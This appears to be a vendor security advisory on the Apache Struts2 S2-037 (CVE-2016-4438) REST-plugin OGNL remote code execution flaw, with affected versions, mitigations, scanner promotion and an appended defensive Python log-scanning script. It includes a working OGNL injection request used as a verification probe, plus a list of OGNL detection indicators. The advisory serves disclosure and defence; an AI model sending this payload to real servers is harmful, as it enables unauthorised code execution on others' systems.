Apache Struts2 has disclosed a remote code execution vulnerability in its REST plugin: an attacker can send REST calls carrying a malicious expression and achieve remote code execution. The vulnerability is numbered CVE-2016-4438 and named S2-037. Its trigger process is essentially the same as that of S2-033: the methodName in the ActionMapping is passed into OGNL expression evaluation, leading to arbitrary code execution. Unsure whether your business systems are secure? WVSS and RSAS help you identify the risk quickly.
Apache Struts2 has again exposed a remote code execution vulnerability: an attacker can use the REST plugin to call a malicious expression and execute code remotely. The vulnerability is numbered CVE-2016-4438 and named S2-037.
Affected versions: Struts 2.3.20 to Struts 2.3.28.1
All Struts applications that have the REST plugin installed.
Verification request: http://127.0.0.1:8080/struts2-rest-showcase/orders/3//%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23wr%3d%23context%5B%23parameters. obj%5B0%5D,%5D. getWriter(),%23wr. print(%23parameters. content%5B0%5D%2b602%2b53718%2b1239876),%23wr. close(),xx. toString. json?& amp;obj=com. opensymphony. xwork2. dispatcher. HttpServletResponse&content=paglyrwqlnvhfgfkunxucswjhpeiomqmhnmbwbccujdyfyokxexhsuqtflvt
If the response echoes paglyrwqlnvhfgfkunxucswjhpeiomqmhnmbwbccujdyfyokxexhsuqtflvt, the vulnerability is present.
NSFOCUS customers can use the NSFOCUS Web Vulnerability Scanning System (NSFOCUS WVSS) and the NSFOCUS Remote Security Assessment System (NSFOCUS RSAS) to check whether their own application systems contain this vulnerability. Both NSFOCUS WVSS and NSFOCUS RSAS implemented detection for this vulnerability as soon as it was disclosed; update the plugin library to obtain fast, accurate and complete scan coverage.
1. Add a cleanupActionName filter;
2. Use a Web application firewall or similar security device for protection;
3. Follow the Apache website and update promptly to Struts 2.3.29: https://struts.apache.org/
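As an added example, not part of the NSFOCUS advisory or of the Struts project's own code, the following Python script shows two defender-side checks suggested by the verification request above and by mitigation 1: it extracts the method-name position from a REST-style request path, applies the kind of plain-identifier allow-list a cleanupActionName filter enforces, and flags URL-decoded OGNL indicators in access-log lines. The log lines are constructed, the path-parsing rule is a simplification of the REST plugin's mapping, and the indicator list is an assumption.

```python
import re
from typing import Dict, List
from urllib.parse import unquote

# Constructed sample access-log lines (not taken from the advisory): one benign
# REST call and one with an OGNL expression in the method-name path position.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jul/2016:10:00:01 +0000] "GET /struts2-rest-showcase/orders/3/edit HTTP/1.1" 200 512
10.0.0.9 - - [01/Jul/2016:10:00:02 +0000] "GET /struts2-rest-showcase/orders/3//%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,xx.toString.json HTTP/1.1" 200 77
"""

# Assumed allow-list: a legitimately dispatched method name is a plain identifier.
SAFE_METHOD_NAME = re.compile(r"^[A-Za-z0-9_]*$")

# Assumed indicators of OGNL injection, matched against the lower-cased, decoded URI.
OGNL_INDICATORS = (
    "#_memberaccess",
    "@ognl.ognlcontext",
    "#context[",
    "#parameters",
    "getwriter(",
)

# Pulls the request method and URI out of a common-log-format line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/')


def method_name_from_uri(uri: str) -> str:
    """Return the decoded path segment that a REST mapper would treat as the method name.

    Simplified rule (assumption): for /<namespace>/<resource>/<id>/<methodName>[.ext]
    the method name is the last path segment with any extension removed.
    """
    path = uri.split("?", 1)[0]
    last_segment = unquote(path).rsplit("/", 1)[-1]
    if "." in last_segment:
        last_segment = last_segment.rsplit(".", 1)[0]
    return last_segment


def is_safe_method_name(name: str) -> bool:
    """True only if the method name contains nothing but identifier characters."""
    return SAFE_METHOD_NAME.fullmatch(name) is not None


def has_ognl_indicators(uri: str) -> bool:
    """Decode twice so that double-encoded sequences (%2523) are also caught."""
    decoded = unquote(unquote(uri)).lower()
    return any(indicator in decoded for indicator in OGNL_INDICATORS)


def scan_log(text: str) -> List[Dict[str, object]]:
    """Return one finding per request whose method-name segment fails the
    allow-list or whose URI carries OGNL indicators."""
    findings: List[Dict[str, object]] = []
    for line in text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        uri = match.group("uri")
        name = method_name_from_uri(uri)
        bad_name = not is_safe_method_name(name)
        ognl = has_ognl_indicators(uri)
        if bad_name or ognl:
            findings.append(
                {
                    "uri": uri,
                    "method_name": name,
                    "bad_method_name": bad_name,
                    "ognl_indicators": ognl,
                }
            )
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Running the script reports only the second constructed line, flagged both because its method-name segment is not a plain identifier and because it contains OGNL indicators; the same allow-list check is the property a cleanupActionName filter in front of the action mapper is meant to guarantee.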
Refer to the official advisory: https://cwiki.apache.org/confluence/display/WW/s2-037